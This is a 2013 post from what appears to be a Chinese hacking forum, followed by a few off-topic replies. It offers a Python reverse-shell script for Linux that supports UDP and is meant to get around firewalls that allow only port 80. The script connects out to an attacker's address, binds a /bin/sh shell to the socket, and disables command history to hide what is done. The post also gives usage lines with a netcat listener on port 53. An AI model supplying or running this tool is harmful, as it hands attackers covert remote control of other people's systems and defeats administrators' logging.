切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
Linux UDP 反弹脚本 py[复制链接]
发表于 2013-8-21 00:06:51 | 显示全部楼层 |!read_mode!
用来对付一些把除了80端口都封了的变态网管

用法 back.py 123.123.123.123 53 udp

nc监听:
nc -l 53 -u


后面不加udp的话还是默认的tcp

因为udp没有sequence的特性,当数据超过1个数据包的大小时会错位,具体多大会分包不太清楚,我记得是1500字节?好像和MTU有关。命令不要打太长就行了(一般情况下好像基本不会有1500个字符的命令)


# -*- coding:utf-8 -*-
#!/usr/bin/env python
"""
back connect py version,only linux have pty module
code by google security team
UDP by [email]anthrax@insight-labs.org[/email]
"""
import sys,os,socket,pty
shell = "/bin/sh"
def usage(name):
    print 'python reverse connector'
    print 'usage: %s <ip_addr> <port> [udp]' % name
 
def main():
    if len(sys.argv) <3:
        usage(sys.argv[0])
        sys.exit()
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        if sys.argv[3]=='udp':
            s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
    except:pass   
    try:
        s.connect((sys.argv[1],int(sys.argv[2])))
        print 'connect ok'
    except:
        print 'connect faild'
        sys.exit()
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    global shell
    os.unsetenv("HISTFILE")
    os.unsetenv("HISTFILESIZE")
    os.unsetenv("HISTSIZE")
    os.unsetenv("HISTORY")
    os.unsetenv("HISTSAVE")
    os.unsetenv("HISTZONE")
    os.unsetenv("HISTLOG")
    os.unsetenv("HISTCMD")
    os.putenv("HISTFILE",'/dev/null')
    os.putenv("HISTSIZE",'0')
    os.putenv("HISTFILESIZE",'0')
    pty.spawn(shell)
    s.close()
 
if __name__ == '__main__':
    main()


操千曲而后晓声,观千剑而后识器。
kikay_lee 该用户已被删除
发表于 2013-8-21 22:39:23 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2013-8-22 17:19:07 | 显示全部楼层
菊花求权限,求章,求妹纸,求版主,各种求。。。


发表于 2013-8-22 19:15:45 | 显示全部楼层
小男孩 发表于 2013-8-22 17:19
菊花求权限,求章,求妹纸,求版主,各种求。。。

可以啊  哪个版?

代码区

GMT+8, 2019-12-14 17:57

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部